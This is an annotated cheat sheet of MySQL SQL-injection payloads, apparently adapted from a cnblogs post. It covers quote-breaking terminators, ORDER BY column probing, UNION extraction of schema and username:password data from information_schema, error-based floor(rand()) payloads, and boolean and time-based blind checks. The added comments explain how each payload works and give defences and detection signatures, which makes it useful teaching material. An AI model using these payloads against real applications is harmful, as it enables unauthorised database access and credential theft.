  • 常见注入语句

    # Basic injection: close the single-quoted string, then comment out the rest of the query.
    # In a URL, `+` and `%20` decode to a space (MySQL's `--` comment needs one after it) and `%23` decodes to `#`.
    # Defensive note: these strings only have an effect when the parameter is concatenated into the
    # SQL text; with bound parameters the quote stays inside the value.
    ' --+
    ' --%20
    ' #
    ' %23
    # Boolean pair: a page that renders differently for 1=1 and 1=2 shows the input reaches the WHERE clause.
    ' and 1=1 --+
    ' and 1=2 --+
    # UNION against guessed table names (admin, user, users).
    ' and 1=2 union select * from admin --+
    ' and 1=2 union select * from user --+
    ' and 1=2 union select * from users --+
    # Column-count probing (the original heading says "field length"): ORDER BY n raises an error
    # once n exceeds the number of columns the query selects.
    # Detection: a run of requests that differ only in an incrementing ORDER BY index is a
    # recognisable pattern in access and WAF logs.
    ' order by 1 --+
    ' order by 2 --+
    ' order by 3 --+
    ' order by 4 --+
    ' order by 5 --+
    ' order by 6 --+
    ' order by 7 --+
    ' order by 8 --+
    ' order by 9 --+
    ' order by 10 --+
    # Server information via UNION. As the original notes, these only line up when the query
    # selects exactly one column.
    ' and 1=2 union all select version() --+
    ' and 1=2 union all select user() --+
    ' and 1=2 union all select database() --+
    # Operating-system identification: reads the @@global.version_compile_os system variable.
    # NOTE(review): the `from mysql.user` clause needs read access to the mysql schema, which an
    # application account should not have.
    ' and 1=2 union all select @@global.version_compile_os from mysql.user --+
    # Privilege check. 114 is ASCII 'r', so this only tests that user() starts with 'r'; the
    # original reads a normal response as "root", which is an inference, not proof.
    # Defensive note: the application should not connect as root in the first place.
    ' and ord(mid(user(),1,1))=114 --+
    # Data extraction through a 10-column UNION: server details first, then schema, table and
    # column names from information_schema, then row contents. `table_name` is the author's
    # placeholder; 0x3a is ':' used as a separator.
    # Defensive notes: information_schema only lists objects the connected account has privileges
    # on, so a narrowly scoped application account limits what these return. A request parameter
    # containing `information_schema` or `group_concat(` is a strong detection signal.
    ' and 1=2 union select user(),version(),database(),@@datadir,SCHEMA_NAME,current_user(),7,8,9,10 from information_schema.SCHEMATA limit 0,1 --+
    ' and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1--+
    ' and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1--+
    ' and 1=2 union select 1,2,3,group_concat(COLUMN_NAME),5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1--+
    ' and 1=2 union select 1,2,3,group_concat(username),5,6,7,8,9,10 from table_name --+
    ' and 1=2 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from table_name --+
    
    # Without comment characters: the trailing `'1` pairs with the application's own closing
    # quote instead of commenting it out.
    # Defensive note: stripping `--` and `#` from input is therefore not a mitigation; bind the
    # parameter instead.
    ' and '1
    ' union select 1 and '1 
    ' union select 1,2 and '1 
    ' and 1=2 union select 1,version(),3 and '1 
    ' or '1 
    
    # Queries that wrap the parameter in parentheses, e.g. ('value'). The original heading calls
    # this "anti-injection", but the wrapping is not a defence: the same comment terminators apply
    # once the quote and parenthesis are closed.
    ') --+
    ') --%20
    ') #
    ') %23
    
    # Queries that delimit the parameter with double quotes. As with single quotes, the choice of
    # delimiter is not a defence; only parameter binding keeps the value out of the SQL text.
    " --+
    " --%20
    " #
    " %23
    
    # Double quotes plus parentheses, e.g. ("value"): the same terminators after closing both.
    ") --+
    ") --%20
    ") #
    ") %23
    
    # Double-query (error-based) injection, built up step by step as plain MySQL statements.
    # Row count of a table (the original note says "fields"; count(*) returns the number of rows).
    select count(*) from table_name;
    # Random number generation: rand() returns a value in [0, 1).
    select rand();
    select rand()*4;
    # floor() rounds down to an integer (the original note says "floating point"):
    # floor(rand()) is always 0, floor(rand()*4) is 0 to 3.
    select floor(rand());
    select floor(rand()*4);
    # Column alias.
    select floor(rand()*4) as query;
    # Grouping.
    # NOTE(review): with ONLY_FULL_GROUP_BY enabled MySQL is expected to reject this statement,
    # because password is neither grouped nor aggregated.
    select username,password from user group by username;
    # Nested query (a subquery used as a value).
    select(select database());
    # String concatenation with concat(str1,str2); 0x3a is ':' used as a visible delimiter.
    select concat((select database()));
    select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
    select concat(0x3a,0x3a,(select database()),0x3a,0x3a) as query;
    select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query;
    select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user;
    # Grouping on the rand()-based alias can raise a duplicate-key error whose message echoes the
    # concatenated value.
    # Defensive note: this only leaks data when raw database errors reach the HTTP response;
    # return a generic error page and log the detail server-side.
    select count(*),concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user group by query;
    select count(*),concat(0x3a,0x3a,(select user()),0x3a,floor(rand()*2)) as query from user group by query;
    select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query;
    
    # The grouped rand()/concat() query wrapped as a derived table and placed behind a closing quote.
    # Detection: `floor(rand(` combined with `group by` and `information_schema` inside a single
    # request parameter is a well-known error-based signature for WAF and log rules.
    ' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+
    ' and 1=2 union (select * from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+
    
    # Blind injection
    # Boolean-based: the building blocks as plain MySQL statements.
    select database();
    # Length of the value.
    select length(database());
    # Substring: substr(str,num1,num2), where num1 is the 1-based start position and num2 is the
    # number of characters to take.
    select substr(database(),1,1);  
    # ASCII code of that character.
    select ascii(substr(database(),1,1));
    
    # Boolean blind checks: the page's true/false rendering answers one comparison per request.
    # 98 is ASCII 'b', the first letter of the author's example database name.
    # Detection: many near-identical requests that vary only a substr() position or a compared
    # number indicate automated blind extraction; rate limiting and alerting on `ascii(substr(`
    # in parameters help surface it.
    ' and 1<2 --+
    ' and (ascii(substr((select database()),1,1)))=98--+
    
    # Time-based blind injection
    # sleep(n) pauses the statement for n seconds.
    select sleep(1);
    # Conditional delay: sleeps only when the comparison is true. "bloodzero" is the author's
    # example database name.
    select if((select database())="bloodzero",sleep(10),null);
    
    # Time-based checks: the response delay, not the page content, carries the answer.
    # Detection: response times that cluster around a fixed delay, slow-query log entries that
    # contain sleep(), and `sleep(` in request parameters are the usual indicators.
    ' and sleep(10) --+
    ' and if((select database())="bloodzero",sleep(10),null)--+
  • 原文地址:https://www.cnblogs.com/BloodZero/p/4457999.html